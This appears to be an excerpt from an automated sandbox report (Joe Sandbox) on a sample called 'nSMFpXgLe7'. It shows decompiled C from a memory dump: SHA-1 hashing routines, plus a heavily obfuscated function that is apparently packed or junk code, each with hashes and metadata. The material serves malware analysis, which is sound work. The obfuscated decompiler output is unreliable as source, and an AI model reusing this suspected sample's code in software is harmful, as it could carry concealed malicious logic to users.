                  					_v12 = _t449;
                  					asm("rol edx, 0x5");
                  					_v16 = _t279;
                  					asm("ror ecx, 0x2");
                  					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x144)) + _t449 + _v16 - 0x359d3e2a;
                  					_t408 = _v12;
                  					_v12 = _t303;
                  					asm("rol eax, 0x5");
                  					_v16 = _t347;
                  					_t539 = (_t347 ^ _t372 ^ _t408) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                  					_t305 = _t372;
                  					_v8 = _t347;
                  					asm("ror edx, 0x2");
                  					_v8 = _t372;
                  					_t360 = _v12;
                  					_v12 = _t539;
                  					asm("rol esi, 0x5");
                  					_t483 = _t484 + 5;
                  					_t506 = (_t305 ^ _t408 ^ _t360) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x13c)) + _t539 + _v16 - 0x359d3e2a;
                  					_v16 = _t305;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t408;
                  					_v12 = _t506;
                  					_v8 = _t483;
                  				} while (_t483 < 0x50);
                  				_t485 = _a4;
                  				 *((intOrPtr*)(_t485 + 8)) =  *((intOrPtr*)(_t485 + 8)) + _t360;
                  				 *((intOrPtr*)(_t485 + 0xc)) =  *((intOrPtr*)(_t485 + 0xc)) + _t408;
                  				_t311 =  *((intOrPtr*)(_t485 + 0x10)) + _v16;
                  				 *_t485 =  *_t485 + _t506;
                  				 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + _t279;
                  				 *((intOrPtr*)(_t485 + 0x10)) = _t311;
                  				 *((intOrPtr*)(_t485 + 0x5c)) = 0;
                  				return _t311;
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: 813b67e1480152116196dee10a49b6cc27a47a2d74abf295679f5f3f0fb653ed
                  • Instruction ID: caada7c80c6c92e1fbd0ba2cb469e5601a31de91e8fce91548a2d936defc4515
                  • Opcode Fuzzy Hash: 813b67e1480152116196dee10a49b6cc27a47a2d74abf295679f5f3f0fb653ed
                  • Instruction Fuzzy Hash: 90022D76E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D674AA418F80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0114B457(signed int* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v304;
                  				signed char* _t277;
                  				signed int* _t278;
                  				signed int _t279;
                  				signed int _t285;
                  				signed int _t288;
                  				signed int _t292;
                  				signed int _t295;
                  				signed int _t299;
                  				signed int _t303;
                  				signed int _t305;
                  				signed int _t311;
                  				signed int _t318;
                  				signed int _t320;
                  				signed int _t323;
                  				signed int _t325;
                  				signed int _t334;
                  				signed int _t340;
                  				signed int _t341;
                  				signed int _t346;
                  				signed int _t353;
                  				signed int _t357;
                  				signed int _t358;
                  				signed int _t362;
                  				signed int _t365;
                  				signed int _t369;
                  				signed int _t370;
                  				signed int _t399;
                  				signed int _t404;
                  				signed int _t410;
                  				signed int _t413;
                  				signed int _t420;
                  				signed int _t423;
                  				signed int _t432;
                  				signed int _t434;
                  				signed int _t437;
                  				signed int _t445;
                  				signed int _t459;
                  				signed int _t462;
                  				signed int _t463;
                  				signed int _t464;
                  				signed int _t470;
                  				signed int _t478;
                  				signed int _t479;
                  				signed int* _t480;
                  				signed int* _t481;
                  				signed int _t488;
                  				signed int _t491;
                  				signed int _t496;
                  				signed int _t499;
                  				signed int _t502;
                  				signed int _t505;
                  				signed int _t506;
                  				signed int _t510;
                  				signed int _t522;
                  				signed int _t525;
                  				signed int _t532;
                  				void* _t536;
                  
                  				_t481 = _a4;
                  				_t353 = 0;
                  				_t2 =  &(_t481[7]); // 0xe909
                  				_t277 = _t2;
                  				do {
                  					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                  					_t353 = _t353 + 4;
                  					_t277 =  &(_t277[0x10]);
                  				} while (_t353 < 0x10);
                  				_t278 =  &_v304;
                  				_v8 = 0x10;
                  				do {
                  					_t399 =  *(_t278 - 0x18);
                  					_t459 =  *(_t278 - 0x14);
                  					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                  					asm("rol ecx, 1");
                  					asm("rol ebx, 1");
                  					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                  					_t278[8] = _t357;
                  					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                  					_t278 =  &(_t278[4]);
                  					asm("rol ebx, 1");
                  					asm("rol edx, 1");
                  					_t46 =  &_v8;
                  					 *_t46 = _v8 - 1;
                  					_t278[6] = _t318 ^ _t399;
                  					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                  				} while ( *_t46 != 0);
                  				_t320 =  *_t481;
                  				_t279 = _t481[1];
                  				_t358 = _t481[2];
                  				_t404 = _t481[3];
                  				_v12 = _t320;
                  				_v16 = _t481[4];
                  				_v8 = 0;
                  				do {
                  					asm("rol ebx, 0x5");
                  					_t462 = _v8;
                  					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                  					_t323 = _v12;
                  					asm("ror eax, 0x2");
                  					_v16 = _t404;
                  					_v12 = _t488;
                  					asm("rol esi, 0x5");
                  					_v8 = _t358;
                  					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                  					_t491 = _t279;
                  					asm("ror ebx, 0x2");
                  					_v16 = _v8;
                  					_t362 = _v12;
                  					_v8 = _t323;
                  					_t325 = _v8;
                  					_v12 = _t410;
                  					asm("rol edx, 0x5");
                  					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                  					_t413 = _v12;
                  					_v16 = _t491;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t362;
                  					_v12 = _t285;
                  					asm("rol eax, 0x5");
                  					_v16 = _t325;
                  					_t496 = _t285 + ( !_t413 & _t325 | _t362 & _t413) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x140)) + _v16 + 0x5a827999;
                  					_t358 = _v12;
                  					_t288 = _v8;
                  					asm("ror edx, 0x2");
                  					_v8 = _t413;
                  					_v12 = _t496;
                  					asm("rol esi, 0x5");
                  					_v16 = _t288;
                  					_t279 = _v12;
                  					_t499 = _t496 + ( !_t358 & _t288 | _t413 & _t358) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x13c)) + _v16 + 0x5a827999;
                  					_t404 = _v8;
                  					asm("ror ecx, 0x2");
                  					_t463 = _t462 + 5;
                  					_t320 = _t499;
                  					_v12 = _t320;
                  					_v8 = _t463;
                  				} while (_t463 < 0x14);
                  				_t464 = 0x14;
                  				do {
                  					asm("rol esi, 0x5");
                  					asm("ror eax, 0x2");
                  					_v16 = _t404;
                  					_t502 = _t499 + (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                  					_t334 = _v12;
                  					_v12 = _t502;
                  					asm("rol esi, 0x5");
                  					_t420 = _t502 + (_t358 ^ _t279 ^ _t334) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                  					asm("ror ebx, 0x2");
                  					_t505 = _t279;
                  					_v16 = _t358;
                  					_t365 = _v12;
                  					_v12 = _t420;
                  					asm("rol edx, 0x5");
                  					asm("ror ecx, 0x2");
                  					_t292 = _t420 + (_t279 ^ _t334 ^ _t365) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                  					_t423 = _v12;
                  					_v8 = _t334;
                  					_v8 = _t365;
                  					_v12 = _t292;
                  					asm("rol eax, 0x5");
                  					_t464 = _t464 + 5;
                  					_t358 = _v12;
                  					asm("ror edx, 0x2");
                  					_t146 = _t505 + 0x6ed9eba1; // 0x6edad48d
                  					_t506 = _t292 + (_t334 ^ _v8 ^ _t423) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x154)) + _t146;
                  					_t295 = _v8;
                  					_v8 = _t423;
                  					_v12 = _t506;
                  					asm("rol esi, 0x5");
                  					_t404 = _v8;
                  					_t499 = _t506 + (_t295 ^ _v8 ^ _t358) +  *((intOrPtr*)(_t536 + _t464 * 4 - 0x150)) + _t334 + 0x6ed9eba1;
                  					_v16 = _t295;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t499;
                  				} while (_t464 < 0x28);
                  				_v8 = 0x28;
                  				do {
                  					asm("rol esi, 0x5");
                  					_v16 = _t404;
                  					asm("ror eax, 0x2");
                  					_t510 = ((_t358 | _t279) & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _v8 * 4 - 0x14c)) + _t499 + _v16 - 0x70e44324;
                  					_t470 = _v12;
                  					_v12 = _t510;
                  					asm("rol esi, 0x5");
                  					_t340 = _v8;
                  					asm("ror edi, 0x2");
                  					_t432 = ((_t279 | _t470) & _t358 | _t279 & _t470) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x148)) + _t510 + _v16 - 0x70e44324;
                  					_v16 = _t358;
                  					_t369 = _v12;
                  					_v12 = _t432;
                  					asm("rol edx, 0x5");
                  					_v8 = _t279;
                  					_t434 = ((_t470 | _t369) & _t279 | _t470 & _t369) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x144)) + _t432 + _v16 - 0x70e44324;
                  					asm("ror ecx, 0x2");
                  					_v16 = _v8;
                  					_t299 = _v12;
                  					_v8 = _t470;
                  					_v12 = _t434;
                  					asm("rol edx, 0x5");
                  					asm("ror eax, 0x2");
                  					_t522 = ((_t369 | _t299) & _t470 | _t369 & _t299) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x140)) + _t434 + _v16 - 0x70e44324;
                  					_v16 = _v8;
                  					_t437 = _t369;
                  					_t358 = _v12;
                  					_v8 = _t437;
                  					_v12 = _t522;
                  					asm("rol esi, 0x5");
                  					_v16 = _v8;
                  					_t499 = ((_t299 | _t358) & _t437 | _t299 & _t358) +  *((intOrPtr*)(_t536 + _t340 * 4 - 0x13c)) + _t522 + _v16 - 0x70e44324;
                  					_t404 = _t299;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t499;
                  					_t341 = _t340 + 5;
                  					_v8 = _t341;
                  				} while (_t341 < 0x3c);
                  				_t478 = 0x3c;
                  				_v8 = 0x3c;
                  				do {
                  					asm("rol esi, 0x5");
                  					_t479 = _v8;
                  					asm("ror eax, 0x2");
                  					_t525 = (_t404 ^ _t358 ^ _t279) +  *((intOrPtr*)(_t536 + _t478 * 4 - 0x14c)) + _t499 + _v16 - 0x359d3e2a;
                  					_t346 = _v12;
                  					_v16 = _t404;
                  					_v12 = _t525;
                  					asm("rol esi, 0x5");
                  					asm("ror ebx, 0x2");
                  					_t445 = (_t358 ^ _t279 ^ _t346) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x148)) + _t525 + _v16 - 0x359d3e2a;
                  					_v16 = _t358;
                  					_t370 = _v12;
                  					_v12 = _t445;
                  					asm("rol edx, 0x5");
                  					_v16 = _t279;
                  					asm("ror ecx, 0x2");
                  					_t303 = (_t279 ^ _t346 ^ _t370) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x144)) + _t445 + _v16 - 0x359d3e2a;
                  					_t404 = _v12;
                  					_v12 = _t303;
                  					asm("rol eax, 0x5");
                  					_v16 = _t346;
                  					_t532 = (_t346 ^ _t370 ^ _t404) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                  					_t305 = _t370;
                  					_v8 = _t346;
                  					asm("ror edx, 0x2");
                  					_v8 = _t370;
                  					_t358 = _v12;
                  					_v12 = _t532;
                  					asm("rol esi, 0x5");
                  					_t478 = _t479 + 5;
                  					_t499 = (_t305 ^ _t404 ^ _t358) +  *((intOrPtr*)(_t536 + _t479 * 4 - 0x13c)) + _t532 + _v16 - 0x359d3e2a;
                  					_v16 = _t305;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t404;
                  					_v12 = _t499;
                  					_v8 = _t478;
                  				} while (_t478 < 0x50);
                  				_t480 = _a4;
                  				_t480[2] = _t480[2] + _t358;
                  				_t480[3] = _t480[3] + _t404;
                  				_t311 = _t480[4] + _v16;
                  				 *_t480 =  *_t480 + _t499;
                  				_t480[1] = _t480[1] + _t279;
                  				_t480[4] = _t311;
                  				_t480[0x17] = 0;
                  				return _t311;
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction ID: e0970503844a911ecf78f22ade9850a7a377e06ac3705cefd38d1e136390817b
                  • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                  • Instruction Fuzzy Hash: BB021D76E006199BDB14CF9AC8805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 59%
                  			E01161506(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __esi) {
                  				signed char _t47;
                  				signed int _t52;
                  				signed int _t57;
                  				signed char _t60;
                  				signed int _t63;
                  				signed int _t68;
                  				signed int _t71;
                  				void* _t72;
                  
                  				_t52 = __ebx;
                  				_t60 = __edx + 1;
                  				asm("adc [0xdc829df8], edi");
                  				_t68 = __esi -  *0x8533973b;
                  				_t47 =  *0x1ba0b09d;
                  				asm("rcr dword [0xfdc8eefe], 0xde");
                  				if(_t68 < 0) {
                  					L1:
                  					asm("rol dword [0x229bb109], 0xeb");
                  					_t71 = _t71 + 1;
                  					asm("rol dword [0x124cdbfd], 0xe8");
                  					 *0xafc40dfd =  *0xafc40dfd << 0xef;
                  				} else {
                  					__edi =  *0x62fa987c * 0x9f6c;
                  					__esi = __esi +  *0xc53548ba;
                  					 *0xe27627ea =  *0xe27627ea - __ebx;
                  					 *0x70cf5619 =  *0x70cf5619 & __eax;
                  					_t9 = __ebx;
                  					__ebx =  *0x1f77fe62;
                  					 *0x1f77fe62 = _t9;
                  					_t10 = __cl;
                  					__cl =  *0xdf061218;
                  					 *0xdf061218 = _t10;
                  					asm("adc dh, 0x4");
                  					_push(__edx);
                  					__eflags =  *0x5ac8a71f - __edi;
                  					__ebp = 0xed789839;
                  					__ecx = __ecx | 0xf091b1f8;
                  					__ecx = __ecx ^ 0x054b23c1;
                  					 *0x604fdff =  *0x604fdff - __esi;
                  					asm("sbb dh, [0xb1509f24]");
                  					__ecx = __ecx ^ 0xf59e72f7;
                  					asm("rcr byte [0xc946004], 0xd9");
                  					__esi = __esi |  *0x2aa88a9c;
                  					__eflags = __esi;
                  					if(__esi != 0) {
                  						goto L1;
                  					} else {
                  						 *0xbeeb3b7b =  *0xbeeb3b7b >> 0xfd;
                  						asm("rol dword [0x23d9e9f7], 0x5b");
                  						__eflags =  *0x8a16faa8 - __bl;
                  						 *0xbcf43e =  *0xbcf43e << 0x7f;
                  						asm("rcl byte [0x72df5ae5], 0x3a");
                  						__esi =  *0xd5dda06b * 0x35c8;
                  						asm("adc al, 0x8");
                  						__eflags =  *0x7a190ab7 & __dh;
                  						__bh = __bh & 0x000000e2;
                  						__dl = __dl - 0x2a;
                  						_push(0xfed6b694);
                  						 *0xf61a1c0d =  *0xf61a1c0d | __ecx;
                  						_t13 = __dl;
                  						__dl =  *0xde5fd22a;
                  						 *0xde5fd22a = _t13;
                  						asm("sbb bl, [0x150f882a]");
                  						__ebx = 0x740d9203;
                  						__dl =  *0xde5fd22a - 0xa0;
                  						asm("rol byte [0x766da22c], 0x91");
                  						 *0x4e20a2c2 =  *0x4e20a2c2 + __esi;
                  						__ecx = __ecx - 0xa2ecbc39;
                  						 *0xc1410824 =  *0xc1410824 - __dh;
                  						asm("sbb esp, 0x6106160d");
                  						asm("cmpsb");
                  						__esi = __esi +  *0xa32a8b64;
                  						 *0x15698b2e =  *0x15698b2e - __edi;
                  						__eflags = __bh & 0x000000f9;
                  						 *0xc612db87 =  *0xc612db87 & 0xed789839;
                  						__esi = __esi &  *0xd4f32f6f;
                  						__bl = __bl +  *0x64002980;
                  						__edi =  *0x3e81cd69 * 0x7d8b;
                  						__eflags = __edi;
                  						if(__edi != 0) {
                  							goto L1;
                  						} else {
                  							0xed789839 +  *0x7a64727b =  *0x7713c005;
                  							 *0x7713c005 = 0xed789839 +  *0x7a64727b;
                  							 *0xe5498c39 =  *0xe5498c39 & __eax;
                  							__eflags = 0x740d9203 -  *0xb17f1cba;
                  							__eax =  *0xd1f9c189;
                  							__ecx = __ecx -  *0x8c1dc296;
                  							__ebp =  *0xf5246a83;
                  							asm("ror dword [0xd585b9fd], 0xb6");
                  							asm("cmpsb");
                  							__bl = 0x2a;
                  							__esi = __esi & 0xed68738e;
                  							__bl =  *0xa0ae7980;
                  							 *0xa0ae7980 = 0x2a;
                  							asm("sbb [0xe1bc4509], ebp");
                  							__esi = __esi ^  *0xb858f365;
                  							__eflags = __esi;
                  							asm("rcl byte [0x991e2cd2], 0x7f");
                  							_t18 = __edx;
                  							__edx =  *0xf2526709;
                  							 *0xf2526709 = _t18;
                  							if(__esi >= 0) {
                  								goto L1;
                  							} else {
                  								__ecx = __ecx - 0xb0051379;
                  								__eflags = __ecx;
                  								if(__ecx > 0) {
                  									goto L1;
                  								} else {
                  									__ebp =  *0x41e4697f * 0xb405;
                  									__ebp =  *0x41e4697f * 0x0000b405 ^  *0x41ec7e9d;
                  									__edx = __edx |  *0x92a9cc05;
                  									asm("sbb edx, [0xd00541f7]");
                  									__esi = __esi |  *0x41e398ce;
                  									asm("adc esp, 0x9cd9dc05");
                  									asm("ror byte [0x880541e5], 0xfc");
                  									__esp = __esp - 0x41f59098;
                  									__edx = __edx &  *0x6161df03;
                  									__dh = __dh |  *0x1dd52704;
                  									 *0xf85f0407 =  *0xf85f0407 + __ebp;
                  									_push( *0x5040716);
                  									__ch = __ch & 0x000000d2;
                  									asm("sbb dh, [0x22040710]");
                  									asm("sbb eax, 0x5070ed3");
                  									__eflags = __edx & 0x01b7bd0b;
                  									__ecx = __ecx + 1;
                  									__ebp = __ebp &  *0x9489db05;
                  									__ecx = __ecx -  *0x120541f7;
                  									__esi = __esi +  *0x41f99dbb;
                  									__eax = __eax ^  *0x7187e707;
                  									asm("sbb ah, 0xb5");
                  									__eax = __eax +  *0x7f5593e;
                  									__dh = __dh & 0x000000f9;
                  									asm("adc [0x43d6a39c], ebp");
                  									_push(__edi);
                  									 *0x61b607f5 =  *0x61b607f5 | __edi;
                  									__eax =  *0x553ddc9c;
                  									__edx = __edx ^ 0x588707f5;
                  									asm("sbb ebp, 0x4db8e79c");
                  									 *0x658908f5 =  *0x658908f5 - __edi;
                  									__eflags =  *0x658908f5;
                  									if( *0x658908f5 <= 0) {
                  										goto L1;
                  									} else {
                  										asm("adc esi, 0x9a4e676");
                  										__eax = __eax + 1;
                  										_pop(__ebp);
                  										_push( *0x83a9cb11);
                  										asm("adc dh, [0xb68f51a2]");
                  										asm("sbb [0xd4c36fd3], edi");
                  										asm("sbb ecx, [0x180b4798]");
                  										__ebx = 0x740d9202;
                  										asm("rcr dword [0x396f1427], 0xce");
                  										 *0x22b60fe0 =  *0x22b60fe0 | __dh;
                  										asm("sbb eax, 0xe87ab039");
                  										__eflags =  *0xacbe1b3a & __dl;
                  										__ebp = __ebp -  *0x5a46760e;
                  										__eflags = __ebp;
                  										asm("rcr byte [0x2212e004], 0xaf");
                  										L1();
                  										__eax = 0x1432dce8;
                  										if(__ebp != 0) {
                  											goto L1;
                  										} else {
                  											__eax = 0x765e1292;
                  											 *0x7fad7fb4 =  *0x7fad7fb4 & __dl;
                  											asm("adc esp, [0x9ab04239]");
                  											__ebx = 0x740d9202 +  *0xfb430b23;
                  											_pop( *0x55126905);
                  											asm("scasd");
                  											__bh = __bh - 0xe7;
                  											__bl = __bl | 0x000000b5;
                  											__esp =  *0xfe068606;
                  											__ecx = __ecx |  *0x716552dd;
                  											 *0x8a520c08 =  *0x8a520c08 - __ah;
                  											__eflags =  *0x8a520c08;
                  											_pop(__ecx);
                  											__ebx =  *0x96f32589;
                  											asm("adc esi, [0xc2f946cb]");
                  											 *0x748079b =  *0x748079b >> 0x11;
                  											if( *0x8a520c08 < 0) {
                  												goto L1;
                  											} else {
                  												__esi =  *0x1275df7c * 0x16f5;
                  												_pop(__ecx);
                  												__eflags =  *0x419c64c2 & __edx;
                  												_push(0x1acbc9c);
                  												asm("rol dword [0x6209f3b9], 0x6f");
                  												asm("sbb bl, [0x16c8e2a8]");
                  												_t25 = __ch;
                  												__ch =  *0x4034a91c;
                  												 *0x4034a91c = _t25;
                  												asm("adc esp, [0xcd236b11]");
                  												__ebx =  *0xe9bc9623;
                  												 *0x94b3753e = __ebx;
                  												__eax = 0x765e1292 ^  *0x59b6a71e;
                  												__esp =  *0x991c2706;
                  												 *0x20928c0a =  *0x20928c0a << 0x81;
                  												__esi = 1 +  *0x1275df7c * 0x16f5;
                  												__eflags = 1 +  *0x1275df7c * 0x16f5;
                  												if(1 +  *0x1275df7c * 0x16f5 < 0) {
                  													goto L1;
                  												} else {
                  													__edi = __edi - 0x4d0e3e78;
                  													__eflags =  *0x11dd25e4 & __cl;
                  													__esp =  *0xcfdb846b * 0x9132;
                  													asm("rcr byte [0xf0eb25e1], 0x5f");
                  													asm("adc ebp, [0x419460cd]");
                  													 *0xe4d40510 =  *0xe4d40510 | __ch;
                  													 *0x5d16d83e =  *0x5d16d83e << 0x3e;
                  													__eflags = __ebx - 0x2c14aff1;
                  													asm("sbb ebx, [0xfe1f93ef]");
                  													asm("adc esp, [0x36c52298]");
                  													__ch = __ch ^ 0x0000000a;
                  													_pop(__esp);
                  													 *0xae04a42e =  *0xae04a42e + __edi;
                  													 *0xe160833e =  *0xe160833e << 0x57;
                  													 *0xc58696c1 =  *0xc58696c1 >> 0xb8;
                  													__edx =  *0x581dcc2d;
                  													__esi =  *0x3da2ec6b * 0x10a2;
                  													__eax = __eax - 1;
                  													 *0x35e322fa =  *0x35e322fa << 0x9f;
                  													__esi =  *0x34b5c4d6;
                  													 *0x34b5c4d6 =  *0x3da2ec6b * 0x10a2;
                  													__ebx = __ebx -  *0xd2aae86f;
                  													 *0xebd2b867 =  *0xebd2b867 << 0x21;
                  													__eflags =  *0xebd2b867;
                  													_push(__edi);
                  													if( *0xebd2b867 != 0) {
                  														goto L1;
                  													} else {
                  														 *0xed564875 =  *0xed564875 | __esi;
                  														__eax = __eax - 0xc888a789;
                  														asm("adc edx, [0x9106e3ff]");
                  														__ecx = __ecx |  *0xd3f283dd;
                  														asm("rol byte [0x40c8ca00], 0x9a");
                  														asm("sbb eax, [0x3161e06f]");
                  														__edx = 0x6b1b12fe;
                  														_pop(__ebx);
                  														 *0x3d535118 = __dl;
                  														__edi = __edi +  *0x5d2ebb9d;
                  														__eflags = __edi;
                  														 *0x28868bbe = __esi;
                  														_pop(__esi);
                  														if(__edi < 0) {
                  															goto L1;
                  														} else {
                  															__eflags =  *0x67810e70 & __esp;
                  															_pop(__esp);
                  															__ebp = __ebp &  *0x77267b8e;
                  															__eflags =  *0xc8e11313 & __esi;
                  															asm("sbb [0x11de9930], dh");
                  															__eflags = __esp & 0x26c92d6e;
                  															_t35 = __ebx;
                  															__ebx =  *0x39d39b05;
                  															 *0x39d39b05 = _t35;
                  															asm("sbb ebp, [0xf1faa695]");
                  															_pop(__ebx);
                  															asm("ror dword [0x270528bc], 0x91");
                  															 *0x46660d19 =  *0x46660d19 & 0x1432dce8;
                  															__eflags =  *0x46660d19;
                  															if( *0x46660d19 < 0) {
                  																goto L1;
                  															} else {
                  																__edx =  *0xa1873c7c * 0x844f;
                  																__eflags = __edx;
                  																if(__edx <= 0) {
                  																	goto L1;
                  																} else {
                  																	__eflags = __esp - 0x8c231776;
                  																	__eax = __eax | 0x1a15de07;
                  																	__bh = __bh -  *0x9c4da9e3;
                  																	__esi = 0x208321b9;
                  																	 *0x14d45329 =  *0x14d45329 + 0x208321b9;
                  																	 *0x976d0a2a =  *0x976d0a2a << 0xeb;
                  																	__edi = 0x9a595abd;
                  																	__esi =  *0x94040260 * 0x46fa;
                  																	asm("lodsd");
                  																	__ebx = 0x43de5d13;
                  																	_push(__esi);
                  																	asm("scasb");
                  																	__ebp = __ebp +  *0x5df5e72e;
                  																	 *0x73dfbfb8 =  *0x73dfbfb8 >> 0x42;
                  																	__eflags = 0x9a595abd - 0xba51a587;
                  																	 *0x418d9ba1 =  *0x418d9ba1 - 0x43de5d13;
                  																	__ebp = __ebp + 0xb7ac0821;
                  																	asm("sbb ch, [0xecc3dca]");
                  																	__ebp =  *0x64155d3b;
                  																	asm("stosd");
                  																	asm("lodsb");
                  																	__ebp =  *0x64155d3b - 1;
                  																	 *0xbb496802 =  *0xbb496802 | __dh;
                  																	__eax = 0x7785b229;
                  																	 *0x7471fc6 =  *0x7471fc6 << 0xcb;
                  																	__esi = __esi;
                  																	 *0x11be59c5 =  *0x11be59c5 - __edx;
                  																	__ch = __ch & 0x000000e4;
                  																	__ebp =  *0xe0d7d093;
                  																	 *0xe0d7d093 =  *0x64155d3b - 1;
                  																	__edx = __edx &  *0xc6486f1;
                  																	__eflags = __edx -  *0xd5a1d01;
                  																	_push(0x9a595abd);
                  																	asm("rcl dword [0x11270e8f], 0xef");
                  																	asm("sbb [0xc9b6456e], ecx");
                  																	asm("sbb esi, 0x1f08e3cc");
                  																	__eflags =  *0x1689aa95 & __esp;
                  																	__esi = __esi | 0xf3eedfa3;
                  																	__eflags = __esi;
                  																	asm("sbb esp, [0x58711d27]");
                  																	if(__eflags < 0) {
                  																		goto L1;
                  																	} else {
                  																		asm("sbb edx, 0xa45adc70");
                  																		__ecx = 0xc4ba9eef;
                  																		if(__eflags > 0) {
                  																			goto L1;
                  																		} else {
                  																			asm("rcr dword [0x30b89477], 0xd0");
                  																			__ebp = 0xa5fd2725;
                  																			__bl = __bl & 0x000000b3;
                  																			__cl = 0xe6;
                  																			 *0xb7bdc865 =  *0xb7bdc865 >> 0x44;
                  																			__esp = __esp - 0x2b88d3;
                  																			__ebp = 0xa5fd2725 +  *0xa4d315c2;
                  																			asm("rcr dword [0x95495c17], 0x45");
                  																			 *0xbcbda0db =  *0xbcbda0db | 0xa5fd2725;
                  																			asm("adc al, 0x28");
                  																			__edi = 0x6848b7d3;
                  																			__esp = __esp | 0x32bb9683;
                  																			_pop(__ecx);
                  																			__edx = __edx -  *0x7ba219be;
                  																			__ebx = 0x43de5d13 &  *0xb0d225eb;
                  																			__esp = __esp &  *0x7a6c8001;
                  																			__esi = __esi |  *0x22cb7662;
                  																			__ebp = 0xa5fd2725 +  *0xa4d315c2 |  *0x6c8a5768;
                  																			asm("adc edx, [0xb13d15c2]");
                  																			 *0xa019206d =  *0xa019206d ^ 0x7785b229;
                  																			__edi = __esp;
                  																			 *0x8a2f7325 =  *0x8a2f7325 >> 0x5b;
                  																			 *0x73373ca3 =  *0x73373ca3 >> 0x15;
                  																			asm("rcr dword [0xecf33c1f], 0xb7");
                  																			__ebx = (0x43de5d13 &  *0xb0d225eb) - 1;
                  																			__al = __al - 0xb2;
                  																			__eax = 0x7785b228;
                  																			__esp = __esp +  *0x5883168f;
                  																			 *0x20935694 =  *0x20935694 + 0x6848b7d3;
                  																			__edi = 0x6848b7d3 ^  *0xd796b60d;
                  																			 *0xe0741718 =  *0xe0741718 << 0x3b;
                  																			__ah = __ah &  *0x53b85538;
                  																			__eflags = __ah;
